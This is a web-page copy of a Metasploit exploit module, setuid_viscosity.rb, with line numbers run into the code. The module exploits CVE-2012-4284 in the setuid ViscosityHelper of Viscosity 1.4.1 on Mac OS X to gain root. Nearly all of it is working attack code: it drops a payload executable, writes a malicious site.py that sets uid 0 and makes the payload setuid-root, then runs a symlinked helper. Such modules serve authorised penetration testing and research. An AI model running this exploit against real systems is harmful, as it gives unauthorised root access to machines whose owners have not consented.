Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/osx/local/setuid_viscosity.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456class MetasploitModule < Msf::Exploit::Local7Rank = ExcellentRanking89include Msf::Post::OSX::Priv10include Msf::Post::File11include Msf::Exploit::EXE1213def initialize(info = {})14super( update_info( info, {15'Name' => 'Viscosity setuid-set ViscosityHelper Privilege Escalation',16'Description' => %q{17This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The18vulnerability exists in the setuid ViscosityHelper, where an insufficient19validation of path names allows execution of arbitrary python code as root.20This module has been tested successfully on Viscosity 1.4.1 over Mac OS X2110.7.5.22},23'References' =>24[25[ 'CVE', '2012-4284' ],26[ 'OSVDB', '84709' ],27[ 'EDB', '20485' ],28[ 'URL', 'http://blog.zx2c4.com/791' ]29],30'License' => MSF_LICENSE,31'Author' =>32[33'Jason A. Donenfeld', # Vulnerability discovery and original Exploit34'juan vazquez' # Metasploit module35],36'DisclosureDate' => '2012-08-12',37'Platform' => 'osx',38'Arch' => [ ARCH_X86, ARCH_X64 ],39'SessionTypes' => [ 'shell' ],40'Targets' =>41[42[ 'Viscosity 1.4.1 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],43[ 'Viscosity 1.4.1 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]44],45'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },46'DefaultTarget' => 047}))48register_options [49# These are not OptPath because it's a *remote* path50OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),51OptString.new("Viscosity", [ true, "Path to setuid ViscosityHelper executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ])52]53end5455def base_dir56datastore['WritableDir'].to_s57end5859def check60unless file? datastore['Viscosity']61vprint_error 'ViscosityHelper not found'62return CheckCode::Safe63end6465check = cmd_exec("find #{datastore["Viscosity"]} -type f -user root -perm -4000")6667unless check.include? 'ViscosityHelper'68return CheckCode::Safe69end7071CheckCode::Vulnerable72end7374def clean75file_rm(@link)76file_rm(@python_file)77file_rm("#{@python_file}c")78file_rm(@exe_file)79end8081def exploit82if is_root?83fail_with Failure::BadConfig, 'Session already has root privileges'84end8586if check != CheckCode::Vulnerable87fail_with Failure::NotVulnerable, 'Target is not vulnerable'88end8990unless writable? base_dir91fail_with Failure::BadConfig, "#{base_dir} is not writable"92end9394exe_name = rand_text_alpha(8)95@exe_file = "#{base_dir}/#{exe_name}"96print_status("Dropping executable #{@exe_file}")97write_file(@exe_file, generate_payload_exe)9899evil_python =<<-EOF100import os101os.setuid(0)102os.setgid(0)103os.system("chown root #{@exe_file}")104os.system("chmod 6777 #{@exe_file}")105os.execl("#{@exe_file}", "#{exe_name}")106EOF107108@python_file = "#{base_dir}/site.py"109print_status("Dropping python #{@python_file}...")110write_file(@python_file, evil_python)111112print_status("Creating symlink...")113link_name = rand_text_alpha(8)114@link = "#{base_dir}/#{link_name}"115cmd_exec "ln -s -f -v #{datastore["Viscosity"]} #{@link}"116117print_status("Running...")118begin119cmd_exec "#{@link}"120rescue121print_error("Failed. Cleaning files #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}...")122clean123return124end125print_warning("Remember to clean files: #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}")126end127end128129130131